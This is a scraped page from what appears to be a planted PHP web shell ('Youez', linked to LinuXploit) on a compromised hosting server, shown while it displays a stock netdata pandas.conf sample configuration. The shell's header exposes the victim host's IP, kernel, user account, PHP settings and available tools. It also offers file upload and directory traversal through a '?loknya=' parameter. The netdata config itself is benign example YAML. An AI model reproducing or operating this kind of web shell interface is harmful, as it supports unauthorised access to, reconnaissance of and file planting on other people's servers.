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<tr><td>Server IP : <font color=#df5>104.19.154.92</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.47</font><br>Web Server : <font color='#df5'>Apache</font><br>System : <font color='#df5'>Linux lon12.onrocket.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC 2023 x86_64</font><br>User : <font color='#df5'>gd5hzp4&nbsp;</font>( <font color='#df5'>1069</font>)<br>PHP Version : <font color='#df5'>7.4.33</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/proc">proc</a>/<a href="?loknya=/proc/thread-self">thread-self</a>/<a href="?loknya=/proc/thread-self/root">root</a>/<a href="?loknya=/proc/thread-self/root/lib">lib</a>/<a href="?loknya=/proc/thread-self/root/lib/netdata">netdata</a>/<a href="?loknya=/proc/thread-self/root/lib/netdata/conf.d">conf.d</a>/<a href="?loknya=/proc/thread-self/root/lib/netdata/conf.d/python.d">python.d</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
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</form></table><br><hr><center style="font-family: Russo One">[ <a href='/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /proc/thread-self/root/lib/netdata/conf.d/python.d/pandas.conf</tr></td></table><br/><pre># netdata python.d.plugin configuration for pandas
#
# This file is in YaML format. Generally the format is:
#
# name: value
#
# There are 2 sections:
#  - global variables
#  - one or more JOBS
#
# JOBS allow you to collect values from multiple sources.
# Each source will have its own set of charts.
#
# JOB parameters have to be indented (using spaces only, example below).

# ----------------------------------------------------------------------
# Global Variables
# These variables set the defaults for all JOBs, however each JOB
# may define its own, overriding the defaults.

# update_every sets the default data collection frequency.
# If unset, the python.d.plugin default is used.
update_every: 5

# priority controls the order of charts at the netdata dashboard.
# Lower numbers move the charts towards the top of the page.
# If unset, the default for python.d.plugin is used.
# priority: 60000

# penalty indicates whether to apply penalty to update_every in case of failures.
# Penalty will increase every 5 failed updates in a row. Maximum penalty is 10 minutes.
# penalty: yes

# autodetection_retry sets the job re-check interval in seconds.
# The job is not deleted if check fails.
# Attempts to start the job are made once every autodetection_retry.
# This feature is disabled by default.
# autodetection_retry: 0

# ----------------------------------------------------------------------
# JOBS (data collection sources)
#
# The default JOBS share the same *name*. JOBS with the same name
# are mutually exclusive. Only one of them will be allowed running at
# any time. This allows autodetection to try several alternatives and
# pick the one that works.
#
# Any number of jobs is supported.
#
# All python.d.plugin JOBS (for all its modules) support a set of
# predefined parameters. These are:
#
# job_name:
#     name: myname            # the JOB's name as it will appear on the dashboard
#                             # dashboard (by default is the job_name)
#                             # JOBs sharing a name are mutually exclusive
#     update_every: 1         # the JOB's data collection frequency
#     priority: 60000         # the JOB's order on the dashboard
#     penalty: yes            # the JOB's penalty
#     autodetection_retry: 0  # the JOB's re-check interval in seconds
#
# Additionally to the above, example also supports the following:
#
#     chart_configs: [&lt;dictionary&gt;]  # an array for chart config dictionaries.
#
# ----------------------------------------------------------------------
# AUTO-DETECTION JOBS

# Some example configurations, enable this collector, uncomment and example below and restart netdata to enable.

# example pulling some hourly temperature data, a chart for today forecast (mean,min,max) and another chart for current.
# temperature:
#     name: &quot;temperature&quot;
#     update_every: 5
#     chart_configs:
#       - name: &quot;temperature_forecast_by_city&quot;
#         title: &quot;Temperature By City - Today Forecast&quot;
#         family: &quot;temperature.today&quot;
#         context: &quot;pandas.temperature&quot;
#         type: &quot;line&quot;
#         units: &quot;Celsius&quot;
#         df_steps: &gt;
#           pd.DataFrame.from_dict(
#             {city: requests.get(f'https://api.open-meteo.com/v1/forecast?latitude={lat}&amp;longitude={lng}&amp;hourly=temperature_2m').json()['hourly']['temperature_2m']
#             for (city,lat,lng)
#             in [
#                 ('dublin', 53.3441, -6.2675),
#                 ('athens', 37.9792, 23.7166),
#                 ('london', 51.5002, -0.1262),
#                 ('berlin', 52.5235, 13.4115),
#                 ('paris', 48.8567, 2.3510),
#                 ('madrid', 40.4167, -3.7033),
#                 ('new_york', 40.71, -74.01),
#                 ('los_angeles', 34.05, -118.24),
#                 ]
#             }
#             );
#           df.describe();                                               # get aggregate stats for each city;
#           df.transpose()[['mean', 'max', 'min']].reset_index();        # just take mean, min, max;
#           df.rename(columns={'index':'city'});                         # some column renaming;
#           df.pivot(columns='city').mean().to_frame().reset_index();    # force to be one row per city;
#           df.rename(columns={0:'degrees'});                            # some column renaming;
#           pd.concat([df, df['city']+'_'+df['level_0']], axis=1);       # add new column combining city and summary measurement label;
#           df.rename(columns={0:'measurement'});                        # some column renaming;
#           df[['measurement', 'degrees']].set_index('measurement');     # just take two columns we want;
#           df.sort_index();                                             # sort by city name;
#           df.transpose();                                              # transpose so its just one wide row;
#       - name: &quot;temperature_current_by_city&quot;
#         title: &quot;Temperature By City - Current&quot;
#         family: &quot;temperature.current&quot;
#         context: &quot;pandas.temperature&quot;
#         type: &quot;line&quot;
#         units: &quot;Celsius&quot;
#         df_steps: &gt;
#           pd.DataFrame.from_dict(
#               {city: requests.get(f'https://api.open-meteo.com/v1/forecast?latitude={lat}&amp;longitude={lng}&amp;current_weather=true').json()['current_weather']
#               for (city,lat,lng)
#               in [
#                   ('dublin', 53.3441, -6.2675),
#                   ('athens', 37.9792, 23.7166),
#                   ('london', 51.5002, -0.1262),
#                   ('berlin', 52.5235, 13.4115),
#                   ('paris', 48.8567, 2.3510),
#                   ('madrid', 40.4167, -3.7033),
#                   ('new_york', 40.71, -74.01),
#                   ('los_angeles', 34.05, -118.24),
#                   ]
#               }
#               );
#           df.transpose();
#           df[['temperature']];
#           df.transpose();

# example showing a read_csv from a url and some light pandas data wrangling.
# pull data in csv format from london demo server and then ratio of user cpus over system cpu averaged over last 60 seconds.
# example_csv:
#     name: &quot;example_csv&quot;
#     update_every: 2
#     chart_configs:
#       - name: &quot;london_system_cpu&quot;
#         title: &quot;London System CPU - Ratios&quot;
#         family: &quot;london_system_cpu&quot;
#         context: &quot;pandas&quot;
#         type: &quot;line&quot;
#         units: &quot;n&quot;
#         df_steps: &gt;
#           pd.read_csv('https://london.my-netdata.io/api/v1/data?chart=system.cpu&amp;format=csv&amp;after=-60', storage_options={'User-Agent': 'netdata'});
#           df.drop('time', axis=1);
#           df.mean().to_frame().transpose();
#           df.apply(lambda row: (row.user / row.system), axis = 1).to_frame();
#           df.rename(columns={0:'average_user_system_ratio'});
#           df*100;

# example showing a read_json from a url and some light pandas data wrangling.
# pull data in json format (using requests.get() if json data is too complex for pd.read_json() ) from london demo server and work out 'total_bandwidth'.
# example_json:
#     name: &quot;example_json&quot;
#     update_every: 2
#     chart_configs:
#       - name: &quot;london_system_net&quot;
#         title: &quot;London System Net - Total Bandwidth&quot;
#         family: &quot;london_system_net&quot;
#         context: &quot;pandas&quot;
#         type: &quot;area&quot;
#         units: &quot;kilobits/s&quot;
#         df_steps: &gt;
#           pd.DataFrame(requests.get('https://london.my-netdata.io/api/v1/data?chart=system.net&amp;format=json&amp;after=-1').json()['data'], columns=requests.get('https://london.my-netdata.io/api/v1/data?chart=system.net&amp;format=json&amp;after=-1').json()['labels']);
#           df.drop('time', axis=1);
#           abs(df);
#           df.sum(axis=1).to_frame();
#           df.rename(columns={0:'total_bandwidth'});

# example showing a read_xml from a url and some light pandas data wrangling.
# pull weather forecast data in xml format, use xpath to pull out temperature forecast.
# example_xml:
#     name: &quot;example_xml&quot;
#     update_every: 2
#     line_sep: &quot;|&quot;
#     chart_configs:
#       - name: &quot;temperature_forcast&quot;
#         title: &quot;Temperature Forecast&quot;
#         family: &quot;temp&quot;
#         context: &quot;pandas.temp&quot;
#         type: &quot;line&quot;
#         units: &quot;celsius&quot;
#         df_steps: &gt;
#           pd.read_xml('http://metwdb-openaccess.ichec.ie/metno-wdb2ts/locationforecast?lat=54.7210798611;long=-8.7237392806', xpath='./product/time[1]/location/temperature', parser='etree')|
#           df.rename(columns={'value': 'dublin'})|
#           df[['dublin']]|

# example showing a read_sql from a postgres database using sqlalchemy.
# note: example assumes a running postgress db on localhost with a netdata users and password netdata.
# sql:
#     name: &quot;sql&quot;
#     update_every: 5
#     chart_configs:
#       - name: &quot;sql&quot;
#         title: &quot;SQL Example&quot;
#         family: &quot;sql.example&quot;
#         context: &quot;example&quot;
#         type: &quot;line&quot;
#         units: &quot;percent&quot;
#         df_steps: &gt;
#           pd.read_sql_query(
#             sql='\
#                 select \
#                     random()*100 as metric_1, \
#                     random()*100 as metric_2 \
#                ',
#             con=create_engine('postgresql://localhost/postgres?user=netdata&amp;password=netdata')
#             );
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>